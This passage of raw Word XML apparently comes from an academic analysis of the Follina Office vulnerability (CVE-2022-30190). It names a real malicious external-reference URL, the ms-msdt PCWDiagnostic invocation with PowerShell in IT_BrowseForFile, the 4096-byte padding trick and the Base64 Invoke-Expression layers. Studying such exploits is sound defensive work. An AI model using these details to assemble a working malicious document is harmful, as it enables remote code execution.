    <w:p w14:paraId="2784B49E" w14:textId="4409380E" w:rsidR="00A109D9" w:rsidRDefault="00A109D9" w:rsidP="00A109D9">
      <w:r>
        <w:t xml:space="preserve">It was on 30 May 2022 that Microsoft finally allocated a CVE (2022-30190) and it is now classified as a zero-day exploit in Microsoft Defender Vulnerability Management software </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="709383222"/>
          <w:placeholder>
            <w:docPart w:val="C8BD3C6292344480AF5624A7AB3B9BA8"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[31]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D6AB2B" w14:textId="0EF4881A" w:rsidR="00A97ECA" w:rsidRPr="00A97ECA" w:rsidRDefault="00A97ECA" w:rsidP="00A97ECA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The components of the Office document are illustrated below. The document.xml.rels file is located within the word/_rels folder as outlined in figure </w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07792AD1" w14:textId="3D716D88" w:rsidR="00A97ECA" w:rsidRDefault="00A97ECA" w:rsidP="00B82E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71EBE2A6" wp14:editId="07A8B3AE">
            <wp:extent cx="3383280" cy="2885440"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="760259179" name="Picture 760259179" descr="AGk0z-Nw863bCoqJyqzHawiKjw85aE9B9niLdyjI8nP81oRTrKc3jO2Nc8LQJsFb1HBEWOTC3ARSMY2bdKpAWlse1ZI3UO7LLPrsOmzH8A8=s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Gk0z-Nw863bCoqJyqzHawiKjw85aE9B9niLdyjI8nP81oRTrKc3jO2Nc8LQJsFb1HBEWOTC3ARSMY2bdKpAWlse1ZI3UO7LLPrsOmzH8A8=s940"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="25759"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3387228" cy="2888807"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="593F07F3" w14:textId="412024D8" w:rsidR="00A97ECA" w:rsidRDefault="00A97ECA" w:rsidP="00B82E85">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc111363573"/>
      <w:bookmarkStart w:id="46" w:name="_Toc111363710"/>
      <w:bookmarkStart w:id="47" w:name="_Toc111981734"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Components of the Office Document </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1448154258"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[32]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="225B5F87" w14:textId="266C7F3C" w:rsidR="00A97ECA" w:rsidRDefault="00A97ECA" w:rsidP="00726C88"/>
    <w:p w14:paraId="00DF25D9" w14:textId="2522AFED" w:rsidR="00B82E85" w:rsidRDefault="00B82E85" w:rsidP="00726C88">
      <w:r>
        <w:t xml:space="preserve">This file has an external reference pointing to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B82E85">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00726C88">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>tt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82E85">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>ps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B82E85">
        <w:t>as set out in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00726C88">
        <w:t>. (</w:t>
      </w:r>
      <w:r w:rsidR="00726C88" w:rsidRPr="00B82E85">
        <w:t>This website is no longer available</w:t>
      </w:r>
      <w:r w:rsidR="00726C88">
        <w:t>.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F969F" w14:textId="6B9F5BC5" w:rsidR="00B82E85" w:rsidRDefault="00726C88" w:rsidP="00726C88">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251844608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34740477" wp14:editId="44FE5212">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>556260</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>615315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4663440" cy="160020"/>
                <wp:effectExtent l="19050" t="19050" r="22860" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="760259218" name="Rectangle 760259218"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4663440" cy="160020"/>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47B7CB" id="Rectangle 760259218" o:spid="_x0000_s1026" style="position:absolute;margin-left:43.8pt;margin-top:48.45pt;width:367.2pt;height:12.6pt;z-index:251844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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60817CE2" wp14:editId="37130CA7">
            <wp:extent cx="6319445" cy="1112520"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="760259212" name="Picture 760259212" descr="AGk0z-Mh2jUKtAL6bGu7KnQBIxCBYLzG96FJhvWysAiXJhfMjqPJhB55rQrc-ObOELbgQ6YMcXD5LX4SS-1aoqsRsx-Rt_cfslfz151U1FA=s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Gk0z-Mh2jUKtAL6bGu7KnQBIxCBYLzG96FJhvWysAiXJhfMjqPJhB55rQrc-ObOELbgQ6YMcXD5LX4SS-1aoqsRsx-Rt_cfslfz151U1FA=s160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331320" cy="1114611"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B908F99" w14:textId="1E5EE979" w:rsidR="00726C88" w:rsidRDefault="00726C88" w:rsidP="00726C88">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc111363574"/>
      <w:bookmarkStart w:id="49" w:name="_Toc111363711"/>
      <w:bookmarkStart w:id="50" w:name="_Toc111981735"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Target External Reference </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1567647097"/>
          <w:placeholder>
            <w:docPart w:val="EE9E71820EAE45E28E54A8F305D9DFB2"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[32]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="38EDD24A" w14:textId="77777777" w:rsidR="00B82E85" w:rsidRDefault="00B82E85" w:rsidP="00A97ECA"/>
    <w:p w14:paraId="236E00FF" w14:textId="72965BD0" w:rsidR="00B7334E" w:rsidRDefault="00B82E85" w:rsidP="00570D59">
      <w:r>
        <w:t>The output of the</w:t>
      </w:r>
      <w:r w:rsidR="00726C88">
        <w:t xml:space="preserve"> original</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML document </w:t>
      </w:r>
      <w:r w:rsidR="00726C88">
        <w:t xml:space="preserve">[RDF841.html] </w:t>
      </w:r>
      <w:r>
        <w:t>can be found in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00726C88">
        <w:t xml:space="preserve"> Th</w:t>
      </w:r>
      <w:r w:rsidR="00570D59">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00726C88">
        <w:t xml:space="preserve"> HTML document has a script tag together with many ‘A’ characters that have been ‘commented out’. The purpose of these is to </w:t>
      </w:r>
      <w:r w:rsidR="005D339C">
        <w:t>have sufficient characters for the exploit to wor</w:t>
      </w:r>
      <w:r w:rsidR="00B7334E">
        <w:t xml:space="preserve">k as a hardcoded buffer size is required for processing functions </w:t>
      </w:r>
      <w:r w:rsidR="00CE3661">
        <w:t xml:space="preserve">in HTML </w:t>
      </w:r>
      <w:r w:rsidR="00B7334E">
        <w:t>and the payload is not invoked with fewer than 4096 bytes.</w:t>
      </w:r>
      <w:r w:rsidR="005D339C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08838F46" w14:textId="233713F1" w:rsidR="00570D59" w:rsidRDefault="00B7334E" w:rsidP="00570D59">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">At the end of the </w:t>
      </w:r>
      <w:r w:rsidR="00A6445D">
        <w:t>script tag t</w:t>
      </w:r>
      <w:r w:rsidR="00570D59">
        <w:t>he ms-msdt PCWDiagnostic is invoked. The parameters IT_BrowseForFile include PowerShell syntax within the $()</w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F70DE2" w14:textId="4A1CDDFD" w:rsidR="00B82E85" w:rsidRDefault="005D339C" w:rsidP="005071F5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251860992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28E5D899" wp14:editId="0DED0097">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3136901</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525780" cy="228600"/>
                <wp:effectExtent l="19050" t="76200" r="0" b="95250"/>
                <wp:wrapNone/>
                <wp:docPr id="760259221" name="Arrow: Right 760259221"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm rot="19704234">
                          <a:off x="0" y="0"/>
                          <a:ext cx="525780" cy="228600"/>
                        </a:xfrm>
                        <a:prstGeom prst="rightArrow">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FFFC68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760259221" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;margin-left:0;margin-top:247pt;width:41.4pt;height:18pt;rotation:-2070682fd;z-index:25186099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" adj="16904" fillcolor="#c00000" strokecolor="#c00000" strokeweight="1pt">
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00726C88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251852800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="215BD98A" wp14:editId="0F7C933F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3139440</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>149860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3126175" cy="3230880"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="26670"/>
            <wp:wrapNone/>
            <wp:docPr id="760259219" name="Picture 7602592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19" name="Picture 760259219" descr="Tex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3126175" cy="3230880"/>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rsidR="00B82E85" w:rsidRPr="00B82E85">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D66D713" wp14:editId="4867DCB2">
            <wp:extent cx="6394860" cy="4015740"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="760259198" name="Picture 76025919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98" name="Picture 760259198" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6408202" cy="4024118"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="507D1AAF" w14:textId="7CF285FC" w:rsidR="005D339C" w:rsidRDefault="005D339C" w:rsidP="005D339C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc111363575"/>
      <w:bookmarkStart w:id="52" w:name="_Toc111363712"/>
      <w:bookmarkStart w:id="53" w:name="_Toc111981736"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Follina Exploit code </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="782238540"/>
          <w:placeholder>
            <w:docPart w:val="EB1C2BD315FF4885B8C649B85ED2D99C"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[32]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="509EFE9E" w14:textId="48AB802E" w:rsidR="005D339C" w:rsidRDefault="005D339C" w:rsidP="005D339C"/>
    <w:p w14:paraId="152A9E8A" w14:textId="380ECAF7" w:rsidR="005D339C" w:rsidRDefault="00570D59" w:rsidP="005D339C">
      <w:r>
        <w:t xml:space="preserve">Two layers of Invoke-Expression of Base64 encoded data were run and </w:t>
      </w:r>
      <w:r w:rsidR="00B7334E">
        <w:t>the decoded version can be found in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B7334E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F5D832" w14:textId="1FA6491A" w:rsidR="00B7334E" w:rsidRDefault="00B7334E" w:rsidP="00A6445D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B7334E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A7450CD" wp14:editId="3A9FCDC8">
            <wp:extent cx="4625741" cy="1988992"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="11430"/>
            <wp:docPr id="760259226" name="Picture 760259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625741" cy="1988992"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F1CF2" w14:textId="53CEE9D5" w:rsidR="00B7334E" w:rsidRDefault="00B7334E" w:rsidP="00B7334E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc111363576"/>
      <w:bookmarkStart w:id="55" w:name="_Toc111363713"/>
      <w:bookmarkStart w:id="56" w:name="_Toc111981737"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Base64 Encoded Data Decoded</w:t>
      </w:r>
      <w:r w:rsidR="003349FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-110589013"/>
          <w:placeholder>
            <w:docPart w:val="97CD04066F284B47A90DDEC2A1214392"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[32]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="501B71D5" w14:textId="77777777" w:rsidR="00A6445D" w:rsidRDefault="00A6445D" w:rsidP="00B7334E"/>
    <w:p w14:paraId="5BDA438C" w14:textId="05BE8D62" w:rsidR="00B7334E" w:rsidRDefault="00B7334E" w:rsidP="00B7334E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The ‘cmd.exe’ is a variable and the process outlined in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4DFB23" w14:textId="0EE2CFBD" w:rsidR="00B7334E" w:rsidRPr="00B7334E" w:rsidRDefault="00B7334E" w:rsidP="00A6445D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B7334E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E483F6E" wp14:editId="2CDD92AF">
            <wp:extent cx="3909060" cy="3428334"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="20320"/>
            <wp:docPr id="760259227" name="Picture 76025922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27" name="Picture 760259227" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3916688" cy="3435024"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4811C5DD" w14:textId="7A4DEDD0" w:rsidR="00A109D9" w:rsidRDefault="00A6445D" w:rsidP="00A6445D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc111363577"/>
      <w:bookmarkStart w:id="58" w:name="_Toc111363714"/>
      <w:bookmarkStart w:id="59" w:name="_Toc111981738"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003349FC">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:t>Follina Process</w:t>
      </w:r>
      <w:r w:rsidR="003349FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="656574797"/>
          <w:placeholder>
            <w:docPart w:val="BB82B5154FB9478D82ADD82242CB557A"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[32]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="40EBFE5D" w14:textId="77777777" w:rsidR="00A6445D" w:rsidRPr="00A6445D" w:rsidRDefault="00A6445D" w:rsidP="00A6445D"/>
    <w:p w14:paraId="1C6CE0FF" w14:textId="743C25A8" w:rsidR="00A6445D" w:rsidRDefault="00172A21" w:rsidP="00A109D9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The most basic commands required for Follina to work are set out in figures 1</w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and 1</w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1895DEAB" w14:textId="4EA58E99" w:rsidR="00172A21" w:rsidRDefault="00172A21" w:rsidP="00172A21">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00172A21">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61076724" wp14:editId="4543A1DE">
            <wp:extent cx="4518660" cy="914400"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="19050"/>
            <wp:docPr id="760259228" name="Picture 76025922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28" name="Picture 760259228" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId29"/>
                    <a:srcRect r="3734" b="74304"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4519052" cy="914479"/>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405C7254" w14:textId="43C18CF3" w:rsidR="00172A21" w:rsidRDefault="00172A21" w:rsidP="00172A21">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc111363578"/>
      <w:bookmarkStart w:id="61" w:name="_Toc111363715"/>
      <w:bookmarkStart w:id="62" w:name="_Toc111981739"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003349FC">
        <w:t>Mi</w:t>
      </w:r>
      <w:r w:rsidR="005B60FF">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="003349FC">
        <w:t>imum</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Commands for Follina to Run</w:t>
      </w:r>
      <w:r w:rsidR="003349FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
